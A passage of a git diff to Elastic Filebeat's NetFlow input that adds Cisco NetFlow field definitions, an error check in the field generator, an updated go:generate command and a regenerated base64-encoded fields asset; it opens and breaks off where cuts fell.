short - name: vpn_identifier type: short + - name: vr_fname + type: keyword + + - name: waasoptimization_segment + type: short + + - name: wlan_channel_id + type: short + + - name: wlan_ssid + type: keyword + + - name: wtp_mac_address + type: keyword + + - name: xlate_destination_address_ip_v4 + type: ip + + - name: xlate_destination_port + type: integer + + - name: xlate_source_address_ip_v4 + type: ip + + - name: xlate_source_port + type: integer + diff --git a/x-pack/filebeat/input/netflow/decoder/fields/gen.go b/x-pack/filebeat/input/netflow/decoder/fields/gen.go index 743c1a062cbe..2f5d04b28ad1 100644 --- a/x-pack/filebeat/input/netflow/decoder/fields/gen.go +++ b/x-pack/filebeat/input/netflow/decoder/fields/gen.go @@ -131,6 +131,11 @@ func main() { filtered.WriteByte('\n') } } + if scanner.Err() != nil { + fmt.Fprintf(os.Stderr, "Failed reading from %s: %v\n", *header, err) + os.Exit(2) + } + reader := csv.NewReader(filtered) for lineNum := 1; ; lineNum++ { record, err := reader.Read() diff --git a/x-pack/filebeat/input/netflow/doc.go b/x-pack/filebeat/input/netflow/doc.go index 371e8cd66859..c5fee475d7e4 100644 --- a/x-pack/filebeat/input/netflow/doc.go +++ b/x-pack/filebeat/input/netflow/doc.go @@ -4,4 +4,5 @@ package netflow -//go:generate go run fields_gen.go -output _meta/fields.yml --column-name=2 --column-type=3 --header _meta/fields.header.yml decoder/fields/ipfix-information-elements.csv +// Generate fields.yml for all Netflow fields. +//go:generate go run fields_gen.go --header _meta/fields.header.yml -output _meta/fields.yml decoder/fields/ipfix-information-elements.csv,2,3,true decoder/fields/cert_pen6871.csv,3,4,true decoder/fields/cisco.csv,1,4,true decoder/fields/assorted.csv,3,4,true diff --git a/x-pack/filebeat/input/netflow/fields.go b/x-pack/filebeat/input/netflow/fields.go index c1b9fcf244e3..5dd614b6b22c 100644 --- a/x-pack/filebeat/input/netflow/fields.go +++ b/x-pack/filebeat/input/netflow/fields.go @@ -19,5 +19,5 @@ func init() { // AssetNetflow returns asset data. // This is the base64 encoded gzipped contents of input/netflow. func AssetNetflow() string { - return "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" + return "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